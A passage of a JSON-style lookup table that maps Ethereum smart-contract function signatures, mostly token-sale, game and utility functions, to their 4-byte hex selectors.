"0xde1bee1b", "nextStealTimestamp()": "0xa80db9fb", "mmVaultAddr()": "0xecb389e0", "CROWDSALE_PHASE_2_START()": "0x8fbb3c17", "owner1OK()": "0xda78d655", "migrateDisabled()": "0x9fc18d4b", "getCurrSale()": "0xe12097b7", "bonusRemain()": "0x5da34093", "buyFeeMilliPercent()": "0xe93a1906", "drunkness()": "0x7f86d985", "numPlayers()": "0x97b2f556", "totalSent()": "0x46f99063", "presaleFallBackCalled()": "0x577890f6", "isReserveGenerated()": "0xdd0a1019", "referralPercent()": "0x343dfb7e", "bigContributionBound()": "0x01e30a7f", "nextLotteryTTMTokenId5()": "0x06b6689b", "icoPhase4End()": "0x1ca3d4b7", "_initialDistribution()": "0x39a2b580", "RATE_FACTOR()": "0x7067e881", "kyberMultiSigWallet()": "0xc2eddfd2", "recoverWETH()": "0x258b5da6", "tokensPerWei7()": "0xb8506a3f", "rewardAngel()": "0x8b2e92ce", "mntToken()": "0x7f0554ca", "PYRToEth()": "0xbf90c4e7", "totalSupplyFromCrowdsale()": "0x18abfdfc", "statuses()": "0x60bd7a9d", "retrievedTokens()": "0x5c8136c2", "calculateMaxContribution()": "0x83f0b184", "claimPrizes()": "0x3d6ad962", "TIER1()": "0xd8d3b1a4", "startSaleTime()": "0xa961e9e8", "teamReward()": "0x82f0622a", "swapLimit()": "0x6a01f09c", "saleContract()": "0xdaf6ca30", "LowGasAmount()": "0x1094d009", "marriedAt()": "0x83206e78", "matured_block_number()": "0x2a9e97f1", "icoBonus2EndDate()": "0x859a711d", "BIONICCOIN()": "0xd9f884bf", "inRate()": "0x880fc14c", "editionSize()": "0xf4ed0f46", "communityCliff()": "0xa01729a4", "COREthExchangeRate()": "0xbd993f9e", "lastWithdrawalTime()": "0x34a014dc", "add_reward()": "0x4fc78cf1", "phase1StartBlock()": "0x145538ea", "amountOfRedemptionPayouts()": "0xa3961207", "StopSell()": "0xbb128575", "units30percentExtra()": "0x223699c1", "stakingMintAmount()": "0x04e78a30", "pricer()": "0xa6138ed9", "getPendingPartCrateLength()": "0xd489e180", "getPendingBattleRewardsCount(address)": "0xd4798327", "turretElementBySubtypeIndex(uint256)": "0xd45973f4", "partIndexToOwner(uint256)": "0xd3cdb97b", "defenceElementBySubtypeIndex(uint256)": "0xd3b6ac97", "setMetadataBase(string)": "0xd3811c0f", "setWorst(uint8)": "0xd2ed2d30", "scrapCount()": "0xce784216", "countOfOwners()": "0xcd9a1fa6", "deprecateMeleeSubtype(uint8)": "0xc87c07de", "userPendingCrateNumber(address)": "0xc500ea36", "countOfDeeds()": "0xc34588ba", "getPartsOfOwnerWithinRange(address,uint256,uint256)": "0xc2fce718", "ownerByIndex(uint256)": "0xc04d90d0", "burnRate()": "0xbed99850", "convertReward()": "0xbbf48d6f", "deedUri(uint256)": "0xb95d2a53", "scrapPercent()": "0xb87e461c", "getPartsOfOwner(address)": "0xb74e47ac", "getLevel(uint32)": "0xb2cad9b7", "ownsAll(address,uint256[])": "0xad94d901", "createBattle(uint256,uint256[],bytes32,uint256)": "0xab0db220", "setBest(uint8)": "0xa7c591c4", "addApprovedBattle(address)": "0x9fbf538f", "deprecateDefenceSubtype(uint8)": "0x9f7d9f62", "setMinShards(uint8)": "0x9e3249ab", "setScrapMinEndPrice(uint256)": "0x9b7eeb12", "approveMany(address,uint256[])": "0x99bb8134", "setAuctionAddress(address)": "0x93ac3638", "countOfDeedsByOwner(address)": "0x92efd277", "bodyElementBySubtypeIndex(uint256)": "0x9028f20b", "migrate()": "0x8fd3ab80", "redeemShardsIntoPending()": "0x8e92ee66", "owns(address,uint256)": "0x818d4b5d", "addExperience(address,uint256[],int32[])": "0x794b0e6b", "setMediumProbability(uint8)": "0x787b586f", "setMedium(uint8)": "0x77289b50", "addBodyParts(uint8[])": "0x75ec899a", "choosePerk(uint8)": "0x731ac7ed", "getPartById(uint256)": "0x6ea34ce4", "openOldCrates()": "0x6ce76ae3", "tokensOfOwnerWithinRange(address,uint256,uint256)": "0x6b68dd4b", "getUserByAddress(address)": "0x69c212f6", "tokenMetadata(uint256)": "0x6914db60", "transferAll(address,uint256[])": "0x67025dcf", "setMinScaled(int8)": "0x651738a3", "pendingRewards(address,uint256)": "0x6099ecb2", "setBurnRate(uint8)": "0x5eb08d8a", "totalLevel(uint256[])": "0x5c629788", "deedOfOwnerByIndex(address,uint256)": "0x53270910", "mintParts(int256,uint16,address)": "0xf6cbcab0", "partIndexToApproved(uint256)": "0x434f811b", "createAuction(uint256,uint256,uint256,uint256)": "0x431f21da", "redeemBattleCrates()": "0x3dde1598", "partsMinted()": "0x3832677d", "deprecateBodySubtype(uint8)": "0x360c9ed0", "hasOrderedRobotParts(uint256[])": "0x32fb082f", "scrap(uint256)": "0x31a06772", "tokenOfOwnerByIndex(address,uint256)": "0x2f745c59", "meleeElementBySubtypeIndex(uint256)": "0x293100a9", "setScrapAuctionDuration(uint256)": "0x1e42698b", "openPendingPartCrates()": "0x18f95486", "deedByIndex(uint256)": "0x139020d1", "openCrates()": "0x11f43157", "implementsERC721()": "0x1051db34", "hasOpenedOldCrates(address)": "0x06edcd24", "cratesMigrated(address)": "0x05d78739", "setBestProbability(uint8)": "0x01aef755", "addMeleeParts(uint8[])": "0x00c8bb45", "addTurretParts(uint8[])": "0xce813d8f", "freeEther()": "0xc75fc22f", "ExtractDepositTime(address)": "0xa0f561ca", "LastExtractTime()": "0xf3ae5acd", "PutFreeEther()": "0x83fe05f1", "GetFreeEther()": "0xc182f531", "enableTokenWithdrawals(address,bool)": "0x4fbc7e11", "submitPool(uint256)": "0x33e7ed61", "reopenContributions()": "0xcd336707", "closeContributions()": "0x8c60e806", "checkAvailableTokens(address,address)": "0x737c2d8c", "checkContributorBalance(address)": "0xb9c009f0", "checkPoolBalance()": "0x021bc974", "_checkWhitelistContract(address)": "0x026a308a", "_checkCap(address)": "0xc93e8862", "modifyMaxContractBalance(uint256)": "0xabccb043", "modifyAllLevelCaps(uint256[],uint256)": "0xfb73a593", "modifyLevelCap(uint256,uint256)": "0x86a17f29", "modifyIndividualCap(address,uint256)": "0xbe189035", "revoke(address)": "0x74a8f103", "authorizeMany(address[],uint256)": "0xaee0abaa", "authorize(address,uint256)": "0xc1dbd9b2", "_withdraw(address,address)": "0xc43e0e72", "withdrawFor(address,address)": "0xadb5735c", "_ethRefund()": "0xd9f4f56e", "_ethDeposit()": "0x80ee9792", "PresalePool(address,uint256[],uint256)": "0xe0eb6613", "_applyPct(uint256,uint256)": "0x5a7a4c1e", "_toPct(uint256,uint256)": "0x47c848e4", "checkMemberLevel(address)": "0x417ba840", "transferAnyERC20Token(address,uint256)": "0xdc39d06d", "getNextAuditRequest()": "0xbe7a3164", "tgrSettingsPartProject()": "0x163ef5cb", "operationAdress()": "0x29b981bb", "altarFund()": "0xeb4eecec", "unfreezeTeamWalletBlock()": "0xe59d2b7f", "numOfBlocksInMinute()": "0xab9a81c3", "crystal()": "0x971a9091", "MaxToken()": "0xd4c76e8b", "startraffle()": "0xf8dea17f", "PRIVATE_PHASE()": "0x28bcd985", "xrt()": "0x330f9588", "randomOrgAPIKey()": "0xc86b7001", "precentDecimal()": "0x02e32144", "airdrop_percent()": "0x4f9c5bf3", "minAllowedStakeInPercentage()": "0xe7938b82", "isBurnInClose()": "0x071fe9b0", "restrictedAcct()": "0xcf210e16", "getTotalDeveloperCut()": "0x2d06fd13", "newController()": "0x3a02263c", "largeCapDelay()": "0xc6f482aa", "totalTokensICO2()": "0x5df75bdf", "currentMinBid()": "0x6bd8fd12", "fundariaPoolAddress()": "0x56e5e12b", "squak()": "0xa4618691", "madKing()": "0x816f3f4d", "remainToken()": "0x8cdbd8fb", "ProofOf()": "0xcfd4edcf", "windowBonusStep1()": "0xd96a22b8", "COIN_SUPPLY_MKT_TOTAL()": "0x388ba4b5", "exchangeRatio()": "0x4006ccc5", "walletICO()": "0x5999d385", "DEALERWIN()": "0xc89605a2", "limitIcoTokens()": "0x3c20485e", "AddrDevelopFunds()": "0x05af2a81", "corporateSupply()": "0x675abc96", "whitelistDayCount()": "0x8ac97efb", "ADVISORS_TOKENS_SUPPLY()": "0x114630e1", "TOKEN_RATE_05_PERCENT_BONUS()": "0x62d0ce45", "FactomTalk()": "0x595c3f61", "entrepreneur()": "0x054f381b", "TAO()": "0x16e17852", "firstExchangeRatePeriod()": "0xfeefee1b", "privateSalesTokensSold()": "0x3df08c6a", "plockFlag()": "0x30c97068", "ICO_START_DATE()": "0xa99b9e39", "ICOtotalSupply()": "0x0d329d14", "month60Allocated()": "0xa3155013", "logicContract()": "0xcc0e97c9", "minimumSupply()": "0x7ede036d", "proposer()": "0xa8e4fb90", "VOTING_START_BLOCKNR()": "0xc8dda301", "CurrentTokenOwner()": "0xebdbc7d6", "safe()": "0x186f0354", "currentVotingDate()": "0x9f55ecab", "autoFreeze()": "0x2bda04c5", "Airdropsamount()": "0xf1a138f4", "MIN_CONTRIBUTION_WEIS()": "0x9d7233d4", "kingCost()": "0x5841b9bf", "RANGEEND_4()": "0x361819e8", "preStartTime()": "0x4dc41210", "FEE_MUL()": "0x2a77b4af", "mintableTokenAddress()": "0xeabf4240", "remainingGenesisCats()": "0x0ff3687b", "attController()": "0x2a1828fb", "preicoEndDate()": "0x4ef02cf3", "rejectAdvertiserCharges()": "0x6525c29d", "thirdBonus()": "0x93928c91", "enterWallet()": "0x436e388d", "weiMinContribution()": "0xd8743fad", "DEFAULT_MINING_BIT()": "0x761e0d2d", "getTotalMinted()": "0x0ca1c5c9", "minerTotalReward()": "0x8d7b5243", "releaseMarketingTokens()": "0xdc31adee", "stepOneStartTime()": "0x033df9cb", "stringToSignExample()": "0xc6688445", "EXT_COMPANY_ONE()": "0x3d769e3d", "execute_transfer()": "0x773ee5a3", "totalTokenVested()": "0x87c4aaea", "amount()": "0xaa8c217c", "isItemStopped()": "0xf22c618e", "threeHotHoursDuration()": "0x479f8d33", "TEAM0()": "0xc7bb42f7", "undo_deadline()": "0x95925814", "teamCup()": "0x9d8b157b", "lastBlock_v5Hash_uint256()": "0x32abff8e", "m_totalWorkerPoolCount()": "0xbc1013db", "numLeaders()": "0x93f85021", "ini_supply()": "0x3cf39ed3", "redeemedSupply()": "0xc86039da", "subdivisionEnabled()": "0x6612283d", "RESELLING_LOCK_UP_PERIOD()": "0xe137047b", "minInvestmentValue()": "0xfd9304cd", "migrateFrom()": "0x093c5284", "PreICOEarlyDays()": "0xa003371e", "EXCHANGE_COMMISSION()": "0xb6a8933b", "centsPerEth()": "0xf288753d", "PRESALERATE()": "0x55b700af", "minedTokenStartTime()": "0xf635f50c", "OWNERS_ALLOCATED_TOKENS()": "0x3f9a3886", "preSaleRound()": "0xbb48156a", "getJobSponsorships(uint256)": "0x1fffbe7a", "getEmployerJobsForFreelancerInvite(address,address)": "0x083ed817", "getSkillCount()": "0x05f53b29", "getSkillNames(uint256,uint256)": "0x3b91c253", "getEmployerJobs(address,uint8)": "0xc31752c0", "getContractMessages(uint256)": "0x7530fe1d", "getContractInvoices(uint256,uint8)": "0x56f399a7", "getFreelancersJobContracts(address[],uint256)": "0xb2792811", "getJobInvoices(uint256,uint8)": "0xe5db9b49", "getJobContracts(uint256,uint8)": "0x1196493c", "getEmployerInvoices(address,uint8)": "0xde18af92", "getFreelancerInvoices(address,uint8)": "0xd9f861b1", "getEmployerContracts(address,uint256[],uint256[])": "0xbd60527b", "getFreelancerContracts(address,uint256[],uint256[])": "0xfe7d8740", "EthlanceViews(address)": "0x53322527", "shr(uint32,uint8)": "0xe0c68db0", "hashAt(uint16)": "0x018fbf9f", "hashLength()": "0x8abe5593", "timestampLast()": "0x2038e2e6", "timestampFirst()": "0xea1df439", "temperatureRange()": "0x22aab53a", "failedTemperaturesLength()": "0xc6d0ffda", "failedTemperaturesAt(uint16)": "0xb24d8de2", "failedTimestampLength()": "0x23e1d8d0", "failedTimestampSecondsAt(uint16)": "0x32797f44", "nrFailures()": "0x0f79e120", "nrMeasurements()": "0xeba37aff", "failed()": "0xba414fa6", "success()": "0x0b93381b", "verifyReport(uint16,int8[],uint32[])": "0x28720849", "generateReport(int8[],uint32[])": "0x067cf182", "generateReport2(int8[],uint32[])": "0xc4b67e8a", "reportResult(uint32[],int8[],uint32,uint32,uint32,uint32,bytes32)": "0x56f66f4c", "done()": "0xae8421e1", "TemperatureMeasurementA(address,int8,int8,uint16,string)": "0x60b38880", "_emitBoardClosed(uint256,bool)": "0x5ace5128", "_emitUserBinded(uint256,address,bool)": "0x6e56e5eb", "_emitJobBinded(uint256,uint256,bool)": "0xc4c842f7", "emitBoardClosed(uint256,bool)": "0x3e7d081a", "emitUserBinded(uint256,address,bool)": "0x66c31f12", "emitJobBinded(uint256,uint256,bool)": "0x18caa857", "emitBoardCreated(uint256,bytes32,bytes32,address,uint256,uint256,uint256,bool)": "0xc6969604", "_emitBoardCreated(uint256,bytes32,bytes32,address,uint256,uint256,uint256,bool)": "0x477d6c6c", "closeBoard(uint256)": "0x210c1f29", "bindUserWithBoard(uint256,address)": "0xa2dcb5d4", "bindJobWithBoard(uint256,uint256)": "0xc4e9311b", "createBoard(bytes32,bytes32,uint256,uint256,uint256)": "0xd2afeeeb", "getJobStatus(uint256,uint256)": "0xbde842ac", "getBoardStatus(uint256)": "0x6aa084d7", "getBoardsCount()": "0xf4d44b72", "delList(string,uint256,uint256)": "0x0013da50", "printMarket(int256)": "0xa2df26f5", "insertList2(uint256,uint256,uint256,uint256,string,uint256,string)": "0x855d0700", "insertList1(uint256,string,string,string,string,string)": "0x516b48fb", "testInitalBalance()": "0x58b4a3c4", "calculateTokens(address,uint256,uint256)": "0x1adda83a", "buyInternal(address,uint256,uint256)": "0xffd48b73", "SimpleCrowdsaleBase(address)": "0x5965e7c3", "id_for_address(address,address,address)": "0xb2d6fd0b", "test_insert_findWithHint(int256)": "0x147288fb", "test_insert_findWithHintPrevAtPosition(int256)": "0x5a813fd5", "test_insert_findWithHintPrevUpdateTail(int256)": "0x5ee857d1", "test_insert_findWithHintNextAtPosition(int256)": "0xff208fa5", "test_insert_findWithHintNextUpdateTail(int256)": "0x33f2da95", "test_insert_findWithHintNextUpdateHead(int256)": "0x321bbc1c", "test_insert_findNoHintAtPosition(int256)": "0x6919ff17", "test_insert_findNoHintUpdateTail(int256)": "0xc8d508fa", "test_insert_findNoHintUpdateHead(int256)": "0x9e5ad3ea", "getUsedBySoftware(uint256)": "0x0320fead", "getUsedBySoftwareLength()": "0x4f2c9196", "getCitation(uint256)": "0x4b331ca0", "getCitationLength()": "0xfd7801df", "getDonationInfo(uint256)": "0x706df8d6", "getDonationLength()": "0x44a6a8f0", "getProposalsLength()": "0xbc378a73", "getCandidateMemberInfo(uint256)": "0xe3a797f1", "getMemberInfo(uint256)": "0xae99aa3c", "getMemberInfoLength()": "0xaf135ff5", "getAutonomousSoftwareOrgInfo()": "0x8e588306", "geSoftwareVersionRecordsLength()": "0xf2fe1a1d", "getSoftwareVersionRecords(uint32)": "0x5c8747cd", "getSoftwareExecRecordLength()": "0x001dbe8a", "getSoftwareExecRecord(uint32)": "0xc1fcf863", "addSoftwareVersionRecord(bytes32,bytes32,uint256)": "0xc8193841", "addSoftwareExecRecord(bytes32,bytes32,uint256,uint256)": "0x4cf045d5", "UseBySoftware(address)": "0x2434cf10", "Cite(bytes32)": "0x6f2f098b", "DelVoteMemberCandidate(uint256)": "0xfd609b91", "VoteMemberCandidate(uint256)": "0x986ee316", "BecomeMemberCandidate(bytes32)": "0x4dca2770", "WithdrawProposalFund(uint256)": "0x9041f2c8", "VoteForProposal(uint256)": "0x0de3b100", "ProposeProposal(bytes32,bytes32,uint256,uint256,uint256)": "0x139ddefe", "AutonomousSoftwareOrg(bytes32,uint8,uint8,bytes32)": "0x1fd476bd", "create(address,uint256,address,address)": "0xc3cbd341", "ForecastingFactory(address)": "0x20871322", "setConstraint(int256,bytes32,bool,bool)": "0xf279648b", "PLS()": "0x74935f11", "Coin(address)": "0x3f152d11", "SimpleMultiSigWallet(address[],uint256)": "0xaa601e86", "toEth(uint256)": "0x1e2c23b3", "toTuis(uint256)": "0x0bc7fd93", "traded(address,uint256)": "0x90d61290", "set_trader(address)": "0xb2f05133", "ExternalToken(address)": "0x27ef986d", "getAll(uint256)": "0x3c077a48", "getReturnSize(uint256)": "0x25ab2d03", "getLength(uint256)": "0x0986e647", "setList(uint256,uint256[])": "0xb8c58128", "cancelGetTogether()": "0xfba5de1c", "cancelRegistration()": "0xe5a078a7", "amountOfStakeToBeReturned(address,uint256)": "0x8d87b102", "whenStakeCanBeReturned()": "0x4d96e062", "amountOfStakeReturnedOnCancellation(uint256)": "0x26a1529e", "canCancel(uint256)": "0xc411e4d4", "attendeesList()": "0xcc3154f8", "BlockTogether(address,uint256,uint256,uint256)": "0x644a803d", "approveLoan(address,uint256)": "0x9f63f5c3", "approveCollateral(address,uint256)": "0x6a1be7c6", "sendLoan(address,uint256)": "0x1343a35f", "sendCollateral(address,uint256)": "0x62502169", "ensureCollateralBalance(uint256)": "0xe8d34f5d", "ensureLoanBalance(uint256)": "0x08debacb", "testLedgerUnderPayback()": "0xf7309f29", "testLedgerZeroCollateral()": "0x076ccbe4", "testLedgerPayback()": "0x923f9bae", "testLedgerCreation()": "0x7172a1f2", "getNumbers()": "0x89f915f6", "RequestC(bytes32,bytes32)": "0xce2fc8b1", "RequestTest(bytes32,bytes32)": "0x3975e32b", "RequestP(bytes32,bytes32)": "0x26f2458a", "GiveTokenPerm(address,address,bytes32)": "0x1764dc3d", "addCustomerHash(bytes32,bytes32)": "0xc940c1b7", "GetPartyRole(address,address)": "0x61d97c41", "SetIdentifiedContract(address,address)": "0xc0677fb6", "SetStorageContract(address,address)": "0x89de2581", "SetAdminContract(address,address)": "0xa579e461", "IDChain()": "0x60827be8", "arithmetics(uint256,uint256)": "0x8c12d8f0", "setDailyLimit(uint256,uint256)": "0x88362d4b", "verifyProof(bytes32[],bytes32,bytes32)": "0x4bc935d7", "queryByUser(bytes)": "0x861c3a09", "queryByAddr(address)": "0x2deb7571", "deleteAddr(address,bytes)": "0xfdaa94de", "bindAddr(address,bytes)": "0x681833d9", "DaoHubAccount()": "0xda35d581", "canBorrow()": "0x421715c2", "canWithdraw()": "0xb51459fe", "loan(uint256)": "0x365a5306", "addMember(address,bytes32)": "0x49df7208", "invite(address)": "0x4b77c468", "maxBorrowAmount(address)": "0x5a9e75a2", "updateAccountState(address,uint256,bool)": "0x199099dc", "isAddressMember(address)": "0x115ce332", "isAddressInvited(address)": "0xe7722f9b", "Mountain(bytes32,uint256,uint256,uint256,address)": "0x812e6741", "setState(address,uint256)": "0x2469c14e", "updateStateFromOracleFoo(address)": "0xa5acd206", "pregenTokens(address,uint256,uint256)": "0xa74e493f", "MySale(uint256,uint256,uint256,uint256,uint256,uint256,address,bytes32,address,uint256)": "0xbfa3c1e6", "reclaimOwnership(string,string,bytes32)": "0xc5e3b1a6", "Reclaimer(bytes32)": "0xbc04562d", "amountRaised()": "0x7b3e5e7b", "fundingGoal()": "0x7a3a0e84", "expiry()": "0xe184c9be", "beneficiary()": "0x38af3eed", "getNameAndAge()": "0x837e4cd9", "TupleDemo()": "0x3f09ba9c", "payment()": "0x42f6487a", "serviceFee(address,uint256)": "0x81edaae4", "Billing(address,address)": "0x0a1856db", "add(string,int256,int256)": "0x03e5affd", "checkMD(address)": "0x0cf94990", "Send(address,address,uint256)": "0x93eb3c62", "drugs(uint256)": "0xfca5e61e", "accessPolicy()": "0xf5d60a51", "packTable(uint256)": "0xbadaba27", "delKeyValue(uint256,bytes32)": "0x4e233065", "getValueByHash(bytes32)": "0x5436e5a0", "getIdByHash(bytes32)": "0x9fc53f30", "dumpData(uint256,uint256)": "0xc0bd3f40", "getReply(bytes32,uint256,uint256)": "0x4428b072", "getReplyCount(bytes32)": "0xb557a11d", "getReplyRaw(bytes32,uint256)": "0x88668d21", "addReply(bytes32,string,uint256,address)": "0xdf7458cd", "addKeyValue(string,string,string,uint256)": "0xbc2622b4", "becomeMember()": "0x9d083222", "StringMapper()": "0xa8aaa2a6", "getlen(bytes32,bytes32)": "0xbb27e19e", "deletePage(bytes32,bytes32)": "0x8eb206d1", "get(bytes32,bytes32,uint256)": "0x462f9a28", "set(bytes32,bytes32,bytes32,bytes)": "0xed22671d", "setSkillName(address,uint256,bytes32)": "0x6dfe8a34", "getNames(address,uint256,uint256)": "0xc0b9ecc8", "blockSkills(address,uint256[])": "0x5af0dc98", "addSkillNames(address,bytes32[],address)": "0xaa616da1", "addSkillName(address,bytes32,address)": "0x65651b6e", "getSkillCount(address)": "0x2a808899", "thrash()": "0x6e2d604a", "__save128(uint256[])": "0xddae2e26", "emissionEnabled()": "0xfb674cf4", "lastLoveLetter()": "0x45db72ff", "privateOfferingPercentage()": "0x86192c36", "cleanOut()": "0xa6784488", "cliffAdvisorsTokens()": "0x13f6ee53", "endTimeDay()": "0x5931228b", "baseTargetReached()": "0x36a1bbfd", "totalT8EXSold_PRIVATE()": "0x332514d8", "numOfLoadedCrowdsalePurchases()": "0x3dc9124e", "raisedInPresale()": "0x7366e3ff", "gemPerEther()": "0xa8fd1026", "CROWD_WAVE1_PERIOD()": "0x7d54a3ba", "finalizeChangeInsuranceFees()": "0xc3edb4c2", "forFund()": "0x005a7d9a", "changeIsPayableEnabled()": "0xfd037bc5", "teamSupplyAddress()": "0x3c5e270f", "benefitPercents()": "0x25bdb73d", "bonusEndTime333()": "0x24d3eaf3", "initAmount_()": "0x5b206edb", "resetDividends()": "0x97a28819", "getHolderWithdrawIndex()": "0x13cceb21", "ICOSALE_BONUSJOINTTOKENS()": "0x2ec29c59", "exFeeRate()": "0xa50c386a", "icoPhase2End()": "0x5568fd5d", "_beginOfICO()": "0x98ea6536", "techSupport()": "0xd459654a", "creationCap()": "0xeb76607d", "companyAddr()": "0x02587586", "xultoken()": "0xb04510d5", "preSaleEndBlock()": "0x1574126a", "AIRDROPS_COUNT()": "0x1dd95a98", "icostart()": "0x130346d2", "startingAmount()": "0x544f113b", "PROMOTORS_POOL()": "0xd2e474b3", "mainICOStartTime()": "0x76ee3a87", "myFinneyValue()": "0x8899fffd", "TOKEN_CREATED_MIN()": "0xf5689a80", "crossForkFund()": "0x1cd76498", "lcSold()": "0x12883df0", "transfer_status()": "0xac03f324", "ppsBase()": "0x3686d52a", "MIN_USD_FUND()": "0xb4495b7d", "nextGameDeveloperMiningPower()": "0x03c2d5b6", "drpToken()": "0xc61f3a2c", "MaxItems()": "0xc1989276", "atmToken()": "0xf05d85d6", "m_externalMintingEnabled()": "0x44cc5f7e", "fundOnContract()": "0x9061aedd", "candidateTillETHAssets()": "0x25ca5cc6", "arenaContract()": "0x082a8c4e", "escFundAddress()": "0xf060ccb5", "decimalsValue()": "0x3c6aa9f1", "ROLE_STAFF()": "0x22bf2e24", "CLAIM_SIGNER_KEY()": "0xc6702187", "allAmountRaised()": "0xb8de3843", "Strange()": "0x9d866527", "getBylawsMilestoneMaxPostponing()": "0x882ee532", "icoEndTime()": "0x7e1055b6", "numEmptyIndexes()": "0xf897ae8c", "minContributionAmount()": "0x45d5149f", "unclaimedPoolsPresent()": "0x4505d53f", "totalBattle()": "0x99c8268b", "TEAM_AND_ANGEL_SUPPLY()": "0xfdf762bb", "unRedeemedMTU()": "0x8037bfe0", "mDepositWallet()": "0xb05fceba", "minimumBounty()": "0xcdf016ca", "finishedLoading()": "0xfbc7ad3e", "currentIcoWallet()": "0x31e9ee7c", "numTokensLimit()": "0x6139a008", "etherMaximum()": "0xde990bda", "FOUNDER_EXCHANGE_RATE()": "0x4758871d", "newGubberment()": "0x7ed05315", "advisorsAndAmbassadorsAddress()": "0x8f872bb1", "availableCommission()": "0x492f190d", "maxHLPMTMarkup()": "0x140b1706", "ethPreAmount()": "0x718c025a", "lockBet()": "0x16bac7e5", "BPX_per_ETH()": "0x1d01ee9d", "totalDevelopmentFundBalance()": "0xd9f47e41", "nextRoundReserve()": "0xca5541c1", "maxPeriods()": "0x5155bafa", "tokensIssuedForBonusRangeThree()": "0xd951d39a", "STARTING_CROCS()": "0x515b3557", "airdropCooldownEnd()": "0xf2269dba", "endTimeICO()": "0x10ef0ac7", "withdrawlsEnabled()": "0xf7b75258", "minerRelaseTime()": "0xa90fd971", "proposedImplementation()": "0xbb057c5e", "maxSecurityGuardDelay()": "0x0b2e7423", "dividendFundAddress()": "0x536c9a7f", "advisorFee()": "0x52cfd41f", "accFounder()": "0xb99798e8", "minimumSupport()": "0xa72b1444", "accountCount()": "0xe4af29fc", "MIN_TOKEN_AMOUNT()": "0xe3b45ab7", "betsCountToUseFreeBet()": "0xa19638e6", "m_Creator()": "0x00212667", "RDN()": "0x1d8bab91", "isRedeeming()": "0xaaadc832", "initialTokensBalance()": "0x3c72f070", "stopBatchAssign()": "0x1986bc55", "buyTokenPostIco(address,uint256)": "0x2eaf7fe0", "buyTokenIco(address,uint256)": "0x88b55641", "buyTokenPreIco(address,uint256)": "0x3e00b910", "REAL(address)": "0x3d6839c6", "WHOIS(address)": "0x70f6489e", "deleteWallet(address,address)": "0x74707e0d", "registerWallet(address,address)": "0x96793725", "resetRequest(string)": "0x48c875cf", "Pretorian(string,string,string)": "0x11466110", "ideaProofDocument(bytes,uint256)": "0x4de946bf", "getIdeaParties(uint256)": "0x93a0c742", "getIdeaDescription(uint256)": "0x5439af13", "getIdeaDate(uint256)": "0x2933cc47", "getIdea(address)": "0x930ddb8e", "createIdea(address,address[],string)": "0x8aa91406", "changeContractFee(uint256)": "0x8a34bb24", "IPOI(uint256)": "0x373d46b0", "i()": "0xe5aa3d58", "findEndpointByAddress(int256,address)": "0x74fefa2c", "registerEndpoint(int256,string)": "0xaf0bbfb8", "getBal(bytes32,address)": "0x135da3c2", "setBal(bytes32,address,uint256)": "0x2d1e0516", "getBool(bytes32,bytes32)": "0x98eaf11c", "setBool(bytes32,bytes32,bool)": "0xf0f53ee4", "getAddress(bytes32,bytes32)": "0xd3a39686", "setAddress(bytes32,bytes32,address)": "0x79a7cfee", "getUInt(bytes32,bytes32)": "0x53aa3f5e", "setUInt(bytes32,bytes32,uint256)": "0x53e7168b", "fillOrder(address,bytes32,uint256,bytes32)": "0x1faf8995", "publicFillOrder(bytes32,uint256,bytes32)": "0xe233ee0d", "getTrustedShopCount()": "0x30c8f372", "addAllowedToken(address)": "0x4178617f", "isTrustedShop(address)": "0x1382a652", "registerBuy()": "0x71f8746f", "setShopRunning(address,bool)": "0x80378b78", "deployShop(address)": "0x3574da8c", "MarketHub(uint256)": "0x6b78aa08", "getArray2()": "0x2f0b9dcb", "getM()": "0xafb4d2ee", "getT()": "0x22554f34", "getI1()": "0x8b07edba", "addJobInvitation(uint256,address,string)": "0x59e20f69", "addJobProposal(uint256,string,uint256)": "0x917fcc5d", "cancelJobContract(uint256,string)": "0xc183660c", "addJobContract(uint256,string,bool)": "0x0d381cad", "EthlanceContract(address)": "0xbedcb4fc", "is_white_listed(address,uint256,bytes)": "0xe7694493", "is_watched(address)": "0x1cca13d3", "toSlice(bytes,uint32)": "0x42fa3967", "toSlice(bytes)": "0xa97fc381", "TestERC20()": "0x1e186e4c", "feeReceiver()": "0xb3f00674", "sspCount()": "0xd3cedfee", "ssps(uint64)": "0x36faa509", "dsp()": "0x6ed33343", "CampaignContract(address,address,address,address,uint256,string)": "0x416232af", "connect_to_nodelist()": "0x3189418f", "register_minting(address)": "0xf1a3de09", "upgrade_token(address,address,string)": "0x2d976404", "register_token(address,string)": "0xf6c0736b", "change_nodelist(address)": "0xefdc5b77", "register_user(address)": "0xe4779d73", "transfer_token_ownership(address)": "0x865fd239", "count_tokens()": "0x9cfe6c86", "token_is_active(address)": "0xfd86e49d", "get_config()": "0x8a06cb71", "SecondNode(address,string,string)": "0x1d7f2e0c", "lastTokenIsTransferableDate(address)": "0x6c182e99", "tokenGrant(address,uint256)": "0x600e85b7", "calculateVestedTokens(uint256,uint256,uint256,uint256,uint256)": "0xdf3c211b", "tokenGrantsCount(address)": "0x02a72a4c", "revokeAllTokenGrants(address)": "0xd1698430", "revokeTokenGrant(address,uint256)": "0xeb944e4c", "grantVestedTokens(address,uint256,uint64,uint64,uint64,bool,bool)": "0x9754a4d9", "WeiController(address,address,address,uint256,bool)": "0xc5312191", "contributionID(uint256,address,uint256)": "0x473f0117", "contributionAt(uint256,uint256)": "0xcbff69db", "totalContributionsBy(uint256,address)": "0xa90d3cda", "totalCampaignsBy(address)": "0x726d50ee", "operatorCampaignID(address,uint256)": "0x8859c6d6", "payout(uint256,uint256)": "0x5aa6cf97", "refund(uint256,address,uint256)": "0xe796a6eb", "contribute(uint256,address,address,uint256)": "0x0508ed90", "newCampaign(uint256,address,uint256)": "0x6dca35da", "yetAnotherFunction()": "0xd5c5d8e1", "anotherFunction()": "0x0714c622", "ham()": "0xd14f9219", "spam()": "0x47966bc2", "transferable(address)": "0xacb1e61f", "REALPlaceHolder(address,address,address)": "0x0514c275", "StandardToken(address,uint256)": "0x627e667b", "addWeight(address,uint256)": "0xfd636975", "addMember(address,uint256)": "0x98041ea3", "makeAssessment(uint256,uint256,uint256,uint256)": "0x35a07291", "getWeightAndUpdate(address)": "0xde0d0802", "getWeightedRandomMember(uint256)": "0x85b2ff8f", "toggleAvailability()": "0x70a2b84a", "addInitialMember(address,uint256)": "0x3f99fa54", "getParentsLength()": "0x449a058d", "marketToken2019()": "0xa7932d20", "FAPFundDeposit5()": "0x589f30c7", "obligations()": "0x9050b560", "MAX_USD_FUNDING()": "0x935ebb78", "withdrawTokenToFounder()": "0xbef5223f", "ausGroup()": "0x05d1afec", "PublicMiningSupply()": "0x0d8cba74", "totalAirdrop()": "0x5ce97dbb", "needVerified()": "0xc5c00ac6", 